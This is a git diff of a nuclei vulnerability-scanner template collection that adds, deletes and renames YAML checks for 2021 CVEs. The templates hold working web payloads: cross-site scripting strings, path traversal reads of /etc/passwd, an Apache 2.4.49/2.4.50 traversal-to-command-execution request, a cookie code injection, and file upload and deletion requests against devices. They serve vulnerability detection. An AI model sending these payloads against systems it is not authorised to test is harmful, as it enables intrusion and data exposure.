a/nuclei-templates/CVE-2021/cve-2021-41293.yaml b/nuclei-templates/CVE-2021/CVE-2021-41293.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41293.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41293.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41349.yaml b/nuclei-templates/CVE-2021/CVE-2021-41349.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41349.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41349.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41467.yaml b/nuclei-templates/CVE-2021/CVE-2021-41467.yaml deleted file mode 100644 index 616ba257a0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41467.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-41467 - -info: - name: JustWriting - Cross-Site Scripting - author: madrobot - severity: medium - description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. - reference: - - https://github.com/hjue/JustWriting/issues/106 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 - - https://github.com/hjue/JustWriting/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-41467 - cwe-id: CWE-79 - tags: cve,cve2021,justwriting,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41569.yaml b/nuclei-templates/CVE-2021/CVE-2021-41569.yaml deleted file mode 100644 index a65c219ae1..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41569.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2021-41569 -info: - name: SAS 9.4 build 1520 - Local File Inclusion - author: 0x_Akoko - severity: high - description: SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. - reference: - - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 - - https://support.sas.com/kb/68/641.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41569 - cwe-id: CWE-829 - tags: cve,cve2021,sas,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-41653.yaml b/nuclei-templates/CVE-2021/CVE-2021-41653.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41653.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41653.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41691.yaml b/nuclei-templates/CVE-2021/CVE-2021-41691.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41691.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41691.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41773.yaml b/nuclei-templates/CVE-2021/CVE-2021-41773.yaml new file mode 100644 index 0000000000..bf20e22be5 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-41773.yaml @@ -0,0 +1,18 @@ +id: CVE-2021-41773 +info: + name: RCE in Apache HTTP Server 2.4.49 + author: RafaelCaria + severity: critical + tags: cve,cve2021,rce + +requests: + - method: POST + path: + - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' + body: 'echo;id' + + matchers: + - type: regex + part: body + regex: + - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" diff --git a/nuclei-templates/CVE-2021/cve-2021-41826.yaml b/nuclei-templates/CVE-2021/CVE-2021-41826.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41826.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41826.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41878.yaml b/nuclei-templates/CVE-2021/CVE-2021-41878.yaml deleted file mode 100644 index c760d659a5..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41878.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-41878 - -info: - name: i-Panel Administration System 2.0 - Cross-Site Scripting - author: madrobot - severity: medium - description: | - i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console. - reference: - - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html - - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41878 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41878 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-41878 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2021,ipanel,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '>' - - 'i-Panel Administration' - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-41951.yaml b/nuclei-templates/CVE-2021/CVE-2021-41951.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41951.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41951.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-42013.yaml b/nuclei-templates/CVE-2021/CVE-2021-42013.yaml deleted file mode 100644 index 57150aa0e8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-42013.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2021-42013 - -info: - name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution - author: nvn1729,0xd0ff9,666asd - severity: critical - description: | - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. - reference: - - https://httpd.apache.org/security/vulnerabilities_24.html - - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d - - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 - - https://twitter.com/itsecurityco/status/1446136957117943815 - remediation: Upgrade to Apache HTTP Server 2.4.51 or later. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-42013 - cwe-id: CWE-22 - metadata: - verified: "true" - tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev - -variables: - cmd: "echo COP-37714-1202-EVC | rev" - -requests: - - raw: - - |+ - GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - |+ - GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - |+ - POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; {{cmd}} - - stop-at-first-match: true - unsafe: true - matchers-condition: or - matchers: - - type: regex - name: LFI - regex: - - "root:.*:0:0:" - - - type: word - name: RCE - words: - - "CVE-2021-42013" - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2021/cve-2021-42258.yaml b/nuclei-templates/CVE-2021/CVE-2021-42258.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-42258.yaml rename to nuclei-templates/CVE-2021/CVE-2021-42258.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-42551.yaml b/nuclei-templates/CVE-2021/CVE-2021-42551.yaml deleted file mode 100644 index 4d836adbe4..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-42551.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2021-42551 - -info: - name: NetBiblio WebOPAC - Cross-Site Scripting - author: compr00t - severity: medium - description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42551 - - https://www.redguard.ch/advisories/netbiblio_webopac.txt - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-42551 - cwe-id: CWE-79 - tags: cve,cve2021,xss,netbiblio - -requests: - - method: GET - path: - - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x' - - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F' - - host-redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "SearchTerm: 'x'+alert(1)+'x'," - - "SearchTerm: 'x\\\\'+alert(1),//'," - condition: or - - - type: word - part: header - words: - - "text/html" - - - type: word - part: body - words: - - "NetBiblio" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2021/CVE-2021-42565.yaml b/nuclei-templates/CVE-2021/CVE-2021-42565.yaml deleted file mode 100644 index e2eb25ff0b..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-42565.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-42565 - -info: - name: myfactory FMS - Cross-Site Scripting - author: madrobot - severity: medium - description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42565 - - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms - - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-42565 - cwe-id: CWE-79 - tags: cve,cve2021,myfactory,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "" - condition: and - - - type: word - part: header - words: - - "text/html" - -# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2021/cve-2021-43495.yaml b/nuclei-templates/CVE-2021/CVE-2021-43495.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-43495.yaml rename to nuclei-templates/CVE-2021/CVE-2021-43495.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-44529.yaml b/nuclei-templates/CVE-2021/CVE-2021-44529.yaml deleted file mode 100644 index 669869e4a2..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-44529.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2021-44529 - -info: - name: Ivanti EPM Cloud Services Appliance Code Injection - author: duty_1g,phyr3wall,Tirtha - severity: critical - description: "Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody)." - reference: - - https://forums.ivanti.com/s/article/SA-2021-12-02 - - https://twitter.com/Dinosn/status/1505273954478530569 - - https://nvd.nist.gov/vuln/detail/CVE-2021-44529 - metadata: - shodan-query: title:"LANDesk(R) Cloud Services Appliance" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-44529 - cwe-id: CWE-94 - tags: cve,cve2021,ivanti,epm,csa,injection - -requests: - - raw: - - | - GET /client/index.php HTTP/1.1 - Host: {{Hostname}} - Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=; - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "phpinfo()" - - "Cloud Services Appliance" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-44848.yaml b/nuclei-templates/CVE-2021/CVE-2021-44848.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-44848.yaml rename to nuclei-templates/CVE-2021/CVE-2021-44848.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-45043.yaml b/nuclei-templates/CVE-2021/CVE-2021-45043.yaml deleted file mode 100644 index f0787778fa..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-45043.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-45043 - -info: - name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion - author: Momen Eldawakhly,Evan Rubinstein - severity: high - description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-45043 - - https://www.exploit-db.com/exploits/50588 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45043 - - https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-45043 - cwe-id: CWE-22 - metadata: - google-query: intitle:"HD-Network Real-time Monitoring System V2.0" - tags: camera,edb,cve,cve2021,hdnetwork,lfi,iot - -requests: - - raw: - - | - GET /language/lang HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-45092.yaml b/nuclei-templates/CVE-2021/CVE-2021-45092.yaml deleted file mode 100644 index 9b4dd4f9f5..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-45092.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-45092 - -info: - name: Thinfinity Iframe Injection - author: danielmofer - severity: critical - description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter. - reference: - - https://github.com/cybelesoft/virtualui/issues/2 - - https://nvd.nist.gov/vuln/detail/CVE-2021-44848 - - https://www.tenable.com/cve/CVE-2021-45092 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45092 - cwe-id: CWE-74 - tags: iframe,thinfinity,tenable,cve,cve2021,injection - -requests: - - method: GET - path: - - "{{BaseURL}}/lab.html?vpath=//interact.sh" - - matchers: - - type: regex - regex: - - ".*vpath.*" - - "thinfinity" - condition: and - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-45380.yaml b/nuclei-templates/CVE-2021/CVE-2021-45380.yaml deleted file mode 100644 index f02b9d272e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-45380.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-45380 - -info: - name: AppCMS - Cross-Site Scripting - author: pikpikcu - severity: medium - description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. - reference: - - https://github.com/source-trace/appcms/issues/8 - - https://nvd.nist.gov/vuln/detail/CVE-2021-45380 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-45380 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"Powerd by AppCMS" - tags: cve,cve2021,appcms,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"">' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-45428.yaml b/nuclei-templates/CVE-2021/CVE-2021-45428.yaml new file mode 100644 index 0000000000..2ba8ceec99 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-45428.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-45428 +info: + name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload + author: gy741 + severity: critical + description: | + TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + reference: + - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing + - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-45428 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45428 + cwe-id: CWE-639 + metadata: + shodan-query: http.html:"TLR-2005KSH" + verified: "true" + tags: cve,cve2021,telesquare,intrusive,fileupload +requests: + - raw: + - | + GET /{{randstr}}.txt HTTP/1.1 + Host: {{Hostname}} + - | + PUT /{{randstr}}.txt HTTP/1.1 + Host: {{Hostname}} + + CVE-2021-45428 + - | + GET /{{randstr}}.txt HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_1 == 404 && status_code_2 == 201' + - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' + condition: and + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2021/CVE-2021-45968.yaml b/nuclei-templates/CVE-2021/CVE-2021-45968.yaml deleted file mode 100644 index 3cf2c2d6fa..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-45968.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-45968 - -info: - name: Pascom CPS Path Traversal - author: dwisiswant0 - severity: high - description: | - Pascom version packaged with Cloud Phone System (CPS) - versions before 7.20 contains a known path traversal issue - reference: - - https://kerbit.io/research/read/blog/4 - tags: cve,cve2021,pascom,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-45968 - cwe-id: CWE-22 - -requests: - - raw: - - | - GET /services/pluginscript/ HTTP/1.1 - Host: {{Hostname}} - - - | # Double parent to access CMS index - GET /services/pluginscript/..;/..;/ HTTP/1.1 - Host: {{Hostname}} - - - | # Verifying CMS - GET / HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_2 != status_code_1" - - "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-46379.yaml b/nuclei-templates/CVE-2021/CVE-2021-46379.yaml deleted file mode 100644 index 21797b537e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-46379.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2021-46379 - -info: - name: D-Link DIR850 ET850-1.08TRb03 - open redirect - author: 0x_Akoko - severity: medium - description: DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site. - reference: - - https://www.opencve.io/cve/CVE-2021-46379 - - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view - - https://www.cvedetails.com/cve/CVE-2021-46379 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-46379 - cwe-id: CWE-601 - tags: cve,cve2021,redirect,dlink,router - -requests: - - method: GET - path: - - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2021/cve-2021-46381.yaml b/nuclei-templates/CVE-2021/CVE-2021-46381.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-46381.yaml rename to nuclei-templates/CVE-2021/CVE-2021-46381.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-46387.yaml b/nuclei-templates/CVE-2021/CVE-2021-46387.yaml deleted file mode 100644 index a3ef370c63..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-46387.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-46387 - -info: - name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting - author: DhiyaneshDk - severity: medium - description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks. - reference: - - https://www.exploit-db.com/exploits/50797 - - https://www.zyxel.com/us/en/support/security_advisories.shtml - - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing - - https://nvd.nist.gov/vuln/detail/CVE-2021-46387 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-46387 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"Zywall2Plus" - tags: cve,cve2021,xss,zyxel,edb - -requests: - - method: GET - path: - - '{{BaseURL}}/Forms/rpAuth_1?id=
' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Entry Error' - condition: and - - - type: word - part: header - words: - - 'text/html' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-46424.yaml b/nuclei-templates/CVE-2021/CVE-2021-46424.yaml deleted file mode 100644 index 68a13f74a8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-46424.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-46424 -info: - name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete - author: gy741 - severity: critical - description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. - reference: - - https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt - - https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing - - http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-46424 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.1 - cve-id: CVE-2021-46424 - cwe-id: CWE-306 - metadata: - shodan-query: http.html:"TLR-2005KSH" - verified: "true" - tags: cve,cve2021,telesquare,intrusive -requests: - - raw: - - | - GET /images/icons_title.gif HTTP/1.1 - Host: {{Hostname}} - - | - DELETE /images/icons_title.gif HTTP/1.1 - Host: {{Hostname}} - - | - GET /images/icons_title.gif HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/cve-2021-1499.yaml b/nuclei-templates/CVE-2021/cve-2021-1499.yaml new file mode 100644 index 0000000000..02678b971d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-1499.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-1499 + +info: + name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability + author: gy741 + severity: medium + description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. + reference: + - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz + - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2021-1499 + cwe-id: CWE-306 + tags: cve,cve2021,cisco,fileupload,intrusive + +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 + Origin: {{RootURL}} + Referer: {{RootURL}} + + -----------------------------253855577425106594691130420583 + Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" + Content-Type: application/json + + MyPasswdNewData->/api/tomcat + + -----------------------------253855577425106594691130420583-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - '{"result":' + - '"filename:' + - '/tmp/passwd9' + condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-20031.yaml b/nuclei-templates/CVE-2021/cve-2021-20031.yaml new file mode 100644 index 0000000000..57d975870e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20031.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-20031 + +info: + name: Sonicwall SonicOS 7.0 - Host Header Injection + author: gy741 + severity: medium + description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack + reference: + - https://www.exploit-db.com/exploits/50414 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019 + - http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-20031 + cwe-id: CWE-601 + metadata: + google-dork: inurl:"auth.html" intitle:"SonicWall" + tags: cve,cve2021,sonicwall,redirect + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{randstr}}.tld + + matchers-condition: and + matchers: + - type: word + words: + - 'https://{{randstr}}.tld/auth.html' + - 'Please be patient as you are being re-directed' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-20090.yaml b/nuclei-templates/CVE-2021/cve-2021-20090.yaml new file mode 100644 index 